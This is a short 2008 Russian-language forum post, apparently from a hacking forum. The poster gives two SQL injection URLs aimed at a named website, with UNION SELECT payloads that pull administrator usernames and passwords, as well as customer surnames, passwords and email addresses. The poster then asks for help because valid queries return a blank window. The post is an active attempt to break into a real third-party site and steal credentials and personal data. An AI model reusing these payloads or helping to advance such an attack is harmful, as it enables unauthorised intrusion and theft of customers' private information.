20.07.2008, 13:21
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Подскажите плиз, есть сайт с иньекцией:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
также:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Проблема в том, что при попытке ввода любого корректно-составленного запроса показывается пустое окно, а при ошибочном запросе ошибка синтаксиса MySQL.
Подскажите что можно попробовать в этом случае? |
|
|